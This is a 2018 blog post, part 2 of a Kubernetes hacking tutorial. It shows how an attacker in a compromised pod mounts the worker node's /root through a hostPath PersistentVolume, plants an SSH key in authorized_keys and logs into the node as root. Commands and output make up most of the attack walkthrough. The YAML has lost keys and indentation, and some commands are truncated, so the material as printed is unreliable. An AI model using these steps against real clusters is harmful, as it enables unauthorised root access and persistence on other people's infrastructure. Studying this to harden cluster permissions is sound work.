Sunday, 8 April 2018

Hacking kubernetes part 2 - Getting root access to the worker node method 1 (By misconfiguration)

Hi everyone, in today's post I am going to explain how to ssh into the worker node where the pod is hosted. In order to do this, you need to be able to complete part 1 of this tutorial, if you have not seen yet, please do before watching this one.
Now that you are inside the hacked pod with ssh connection, let's try to mount the root volume for the worker node where this pod is running. You should be able to this as it's enabled by default, if the sysadmin didn't changed it, you are good to go. You need this file and the permission to launch pods from inside the hacked pod, again, if that pod is using the default service account you should be able to do it.

File : deployment.yaml

kind: PersistentVolumeClaim
apiVersion: v1
  name: task-pv-claim
  storageClassName: manual
    - ReadWriteOnce
      storage: 1Gi
kind: PersistentVolume
apiVersion: v1
  name: task-pv-volume
    type: local
  storageClassName: manual
    storage: 1Gi
    - ReadWriteOnce
    path: "/root"
kind: Pod
apiVersion: v1
  name: sshworker
    - name: task-pv-storage
       claimName: task-pv-claim
    - name: task-pv-container
      image: centos
      name: sshworker
      command: ["sleep"]
      args: ["66666"]
        - mountPath: "/mnt/worker_node"
          name: task-pv-storage

From inside the hacked pod, apply this config file

[root@hacked-6565c4954f-fnnvj /]# kubectl apply -f deployment.yaml

Now open a bash session on the pod that you just created from inside the hacked pod :

[root@hacked-6565c4954f-fnnvj /]# kubectl exec -ti sshworker /bin/bash

If everything went ok, you should be able to see the contents of the /root folder of the worker node.

[root@sshworker /]# cd /mnt/worker_node/
[root@sshworker worker_node]# 
[root@sshworker worker_node]# ls -la
total 8
drwxr-xr-x 3 root root    0 Apr  8 18:01 .
drwxr-xr-x 1 root root 4096 Apr  8 17:59 ..
-rw------- 1 root root 1737 Apr  8 17:56 .bash_history
drwx------ 2 root root    0 Apr  4 20:48 .ssh
-rw-r--r-- 1 root root    0 Apr  8 18:01 minikube_host

Now go back to the sshworker pod. You need to install a few packages to generate the ssh keys:

[root@sshworker worker_node]# yum install -y -q openssh-clients.x86_64 openssh.x86_64
warning: /var/cache/yum/x86_64/7/base/packages/fipscheck-lib-1.4.1-6.el7.x86_64.rpm: Header V3 RSA/SHA256 Signature, key ID f4a80eb5: NOKEY
Public key for fipscheck-lib-1.4.1-6.el7.x86_64.rpm is not installed
Public key for openssh-7.4p1-13.el7_4.x86_64.rpm is not installed
Importing GPG key 0xF4A80EB5:
 Userid     : "CentOS-7 Key (CentOS 7 Official Signing Key) "
 Fingerprint: 6341 ab27 53d7 8a78 a7c2 7bb1 24c6 a8a7 f4a8 0eb5
 Package    : centos-release-7-4.1708.el7.centos.x86_64 (@CentOS)
 From       : /etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7
[root@sshworker worker_node]#

Now let's generate a ssh key with :

[root@sshworker /]# ssh-keygen -t rsa -b 4096 -f /tmp/hacker.key -q -N ''
[root@sshworker /]#

Check if there is a .ssh folder on root, if there is you don't have to do the following steps, but if can't see, then you do:

ls -la .ssh ( is nothing, then...)
mkdir .ssh
chmod 700 .ssh
cd .ssh

Now add you public key to the authorized_keys file:

cat /tmp/ >> authorized_keys
chmod 600 authorized_keys

Now get the ip address of the host where your pod is running with, run this from the hacked pod where you have installed kubectl command:

[root@hacked-6565c4954f-fnnvj /]# kubectl describe pod sshworker | grep Node:
Node:         k8sdemo/

And now try to ssh into the host:

[root@sshworker .ssh]# ssh -i /tmp/hacker.key -o StrictHostKeyChecking=no root@
                         _             _
            _         _ ( )           ( )
  ___ ___  (_)  ___  (_)| |/')  _   _ | |_      __
/' _ ` _ `\| |/' _ `\| || , <  ( ) ( )| '_`\  /'__`\
| ( ) ( ) || || ( ) || || |\`\ | (_) || |_) )(  ___/
(_) (_) (_)(_)(_) (_)(_)(_) (_)`\___/'(_,__/'`\____)

# id
uid=0(root) gid=0(root) groups=0(root)

And boom!!! You are on the worker node, now you can do this for all other worker nodes.

No comments:

Post a Comment